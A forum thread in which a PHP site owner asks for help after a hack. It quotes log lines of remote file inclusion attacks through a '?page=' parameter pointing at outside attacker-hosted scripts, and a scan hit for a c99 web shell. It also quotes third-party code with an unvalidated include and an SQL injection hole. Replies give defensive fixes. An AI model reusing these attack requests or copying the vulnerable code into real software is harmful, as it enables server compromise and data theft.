Web server hacked

[pdbowling]

Hello, everyone.

I have a php web site.
It got hacked and several things happened.

The index.php was replaced with a new file.
A new file was uploaded. csvxunon.php that was full of hacker code (the security admins deleted before I could get a copy sorry).

So, I changed my password and emailed the security team.

At best, I got a cryptic response. I am sure that the information is useful, but if I have to fix one of my php scripts to make it secure, I'm going to need to know which one it is. There are hundreds of pages.

So if anyone can make sense of these log files, I'd really love to hear from you.

I'll include both tech responses, but the second at least narrows down the tech's opinion of the lines where the breach occurs. I removed my domain and user names for safety and modified the ips in case those are my hosting companies ip's.

Your account is being compromised through an insecure script on the account. You should either remove this script or see if there is a newer version of the script available.


/home/xeditedx/public_html/xdomainEditedx/cvsxunon.php:HG-PHPSHELL.c99.Fragment.AB FOUND


XX.YYY.1Y0.Z /index.php?pagedb=privacy//?page=[URL unfurl="true"]http://jaramadonna.altervista.org/id.txt?[/URL] 503
XXX.34.1Y3.Z2 //?page=[URL unfurl="true"]http://www.domsete.com.br/dom730/images/mambo???[/URL] 200
XXX.34.1Y3.Z2 //?page=[URL unfurl="true"]http://www.domsete.com.br/dom730/images/joomla???[/URL] 200
XXX.1Y2.9Z.2zz //?page=[URL unfurl="true"]http://h1.ripway.com/egre23/egre.txt???[/URL] 503

...hundreds of lines of this stuff ....

First are those ip's for my web server company hosting my site or for hacker tools.

The second response

Hello, Yes we removed the file already. As to how it got there, please refer to the previously provided logs:

X7.Y01.3Y.ZZ1 //?page=http%3A%2F%2Fcodedviro.50webs.com%2Fmypass.php%3F%3F&act=img&img=home 200
X7.Y01.3Y.ZZ1 //?page=http%3A%2F%2Fcodedviro.50webs.com%2Fmypass.php%3F%3F&act=img&img=forward 200
X7.Y01.3Y.ZZ1 //?page=http%3A%2F%2Fcodedviro.50webs.com%2Fmypass.php%3F%3F&act=img&img=back 200
X7.Y01.3Y.ZZ1 //?page=http%3A%2F%2Fcodedviro.50webs.com%2Fmypass.php%3F%3F&act=img&img=refresh 200
67.201.38.211 //?page=http%3A%2F%2Fcodedviro.50webs.com%2Fmypass.php%3F%3F&act=img&img=up 200

That is a snippet of how your account is getting exploited. It looks like one of your scripts parses through a ?page variable that is getting exploited.

Where do I begin to look for the code that is being exploited in this way? I've got hundreds of php files with scripts in them, and the security tech is not being helpful any more. I don't mind researching and fixing it myself, but goodness, where do I start? There is a log file on the server as well showing many reported errors while the attack was happening.

[13-Jul-2008 23:18:02] PHP Warning:  include() [<a href='function.include'>function.include</a>]: php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/myUsername/public_html/myDomain/index.php on line 23

[13-Jul-2008 23:18:02] PHP Warning:  include([URL unfurl="true"]http://dolkenyot.caem??.php)[/URL] [<a href='function.include'>function.include</a>]: failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/myUserName/public_html/myDomain/index.php on line 23

..pages of this stuff..

http://compost.your-info-station.com

 

[jpadie]

the log file should tell you which file/script is being exploited.

if you need to discover which file is misusing $_GET variables then write a script to search iteratively through each database and file and log the results of $_GET usage. that will at least narrow it down. my code editor (aptana) does this for me, and i know that dreamweaver would also.

 

[DonQuichote]

You are not telling a very important thing: who wrote the "hundred pages" of scripts? If it is written by you, you know where to start (with a page parameter that is not validated). If it is a 3rd-party application, then either tell them what happened or search for known issues about that software.

Furthermore, it seems that URL wrappers are switched on if your page parameter can be abused this way. Is that really necessary? It is a security risk and leads exactly to your situation for unsafe code.

+++ Despite being wrong in every important aspect, that is a very good analogy +++
Hex (in Darwin's Watch)

 

[pdbowling]

Hmm,
The code is third party and they are out of business (we see why I guess).
I found the code calling the insecure functions. I turned of register_globals and the site won't even run. Then I turned off allow_url_fopen and that disables the site as well. Other than it being just plane bad code, is there some method of securing this function?

if ($_GET["page"]=='')
 if ($_GET["pagedb"]!='')
 {
   $sql="SELECT * FROM document_master where doc_title='".$_GET["pagedb"]."'";
   $cmd = mysql_query($sql);
   $rs = mysql_fetch_array($cmd);?>		
   <br><?=getsettings(8,"",2);><br><br>
   <?echo $rs["doc_content"];
 }
 else
 {
   include("home.php"); 
 }
else
{
   include($_GET["page"].".php"); 
}
?>
<?include("footer.php"); ?>

Here's the .htaccess file where I turned those parameters off. I also tried changing allow from all to deny to all and then allow valid user. Both killed the site.

# -FrontPage-

IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*

RewriteEngine on
RewriteRule ^category(.*).html$ index.php?page=category&category_id=$1 [L]
RewriteRule ^article(.*).html$ index.php?page=article&article_id=$1 [L]
RewriteRule ^page_(.*).html$ index.php?pagedb=$1 [L]
RewriteRule ^index.html$ index.php

<Limit GET POST>
order deny,allow
deny from all
allow from all
</Limit>
<Limit PUT DELETE>
order deny,allow
deny from all
</Limit>

What really sucks is that I've put so much effort into advertising this site and I may have to take it down because it's just not safe. Grrr.
Thanks, everyone.
Patrick

http://compost.your-info-station.com

 

[Borvik]

What I would do is instead of just calling:

include($_GET["page"].".php");

I would verify that the $_GET["page"] variable is a valid destination. This can be done using the file_exists function - if it doesn't exist then don't include it.

It sounds like someone figured out the scheme and passed their own value for the "page" variable, and caused your script to include something harmful. By verifying the "page" variable before you include it you can prevent this.

 

[DonQuichote]

OK. I would advise you to take such a vulnerable site off-line, especially after hackers have found and abused it. But it probably does something important when it is not hacked.

To repair the situation, copy the whole site to a local PC (preferrable within the safe boundaries of a company network). This PC must off course have a web server and MySQL installed: a web development machine. Copy the database also. Just to make sure, change all e-mail addresses into a company address (so you won't be spamming anyone when testing).

Now, put register_globals and allow_url_fopen OFF on your development PC, and switch all error messages ON, and test the local site. Your screen will probably light up red, but you should be able to see where you must repair the site.

+++ Despite being wrong in every important aspect, that is a very good analogy +++
Hex (in Darwin's Watch)